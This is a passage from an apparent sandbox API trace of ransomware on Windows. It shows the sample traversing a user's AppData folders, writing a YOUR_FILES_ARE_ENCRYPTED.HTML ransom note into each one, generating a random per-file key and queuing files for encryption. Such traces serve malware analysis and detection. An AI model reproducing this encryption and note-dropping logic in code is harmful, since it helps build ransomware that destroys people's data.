dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.859] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.860] CloseHandle (hObject=0x32c) returned 1 [0114.860] GetProcessHeap () returned 0x600000 [0114.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.860] GetProcessHeap () returned 0x600000 [0114.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.861] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f462ea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f462ea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0114.861] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.861] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache") returned 96 [0114.861] GetProcessHeap () returned 0x600000 [0114.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.965] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache" [0114.965] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache\\*" [0114.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f462ea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f462ea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.966] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f462ea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f462ea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0114.966] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f462ea, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f462ea, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0114.966] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.966] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0114.966] GetProcessHeap () returned 0x600000 [0114.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.972] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.973] CloseHandle (hObject=0x32c) returned 1 [0114.973] GetProcessHeap () returned 0x600000 [0114.974] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.974] GetProcessHeap () returned 0x600000 [0114.974] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.974] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0114.974] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.974] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState") returned 96 [0114.974] GetProcessHeap () returned 0x600000 [0114.974] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.975] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState" [0114.975] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState\\*" [0114.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.976] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0114.976] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0114.976] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.976] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0114.976] GetProcessHeap () returned 0x600000 [0114.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.979] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.980] CloseHandle (hObject=0x32c) returned 1 [0114.980] GetProcessHeap () returned 0x600000 [0114.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.980] GetProcessHeap () returned 0x600000 [0114.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.981] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_N")) returned 1 [0114.981] StrStrIW (lpFirst="Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.981] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe") returned 139 [0114.981] GetProcessHeap () returned 0x600000 [0114.981] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.982] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe" [0114.982] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\*" [0114.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.982] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0114.983] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3636a2ee, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3636a2ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0114.983] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.983] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore") returned 155 [0114.983] GetProcessHeap () returned 0x600000 [0114.983] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.984] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore" [0114.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*" [0114.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3636a2ee, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3636a2ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.986] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3636a2ee, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3636a2ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 1 [0114.986] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37a393d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x37a393d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0114.986] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.986] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 175 [0114.986] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.986] lstrlenW (lpString=".dat") returned 4 [0114.986] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.986] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\microsoft.appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0114.986] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0114.987] GetProcessHeap () returned 0x600000 [0114.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.989] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="71") returned 2 [0114.989] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="DB") returned 2 [0114.989] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="8F") returned 2 [0114.989] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="B7") returned 2 [0114.989] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="EB") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="D3") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="1A") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="DD") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="BB") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="EC") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="8E") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="87") returned 2 [0114.989] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="DF") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="86") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A9") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="52") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="64") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="CB") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="5B") returned 2 [0114.990] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="9B") returned 2 [0114.990] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="A3") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="A3") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="69") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="30") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="E1") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="59") returned 2 [0114.990] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="CF") returned 2 [0114.990] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="BB") returned 2 [0114.990] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="7F") returned 2 [0114.990] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="E6") returned 2 [0114.990] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="3D") returned 2 [0114.990] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="65") returned 2 [0114.991] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0114.991] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.991] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.991] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x361ecea1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x361ecea1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x361ecea1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0114.991] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.991] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 180 [0114.991] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.991] lstrlenW (lpString=".LOG1") returned 5 [0114.991] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.991] FindNextFileW (in: 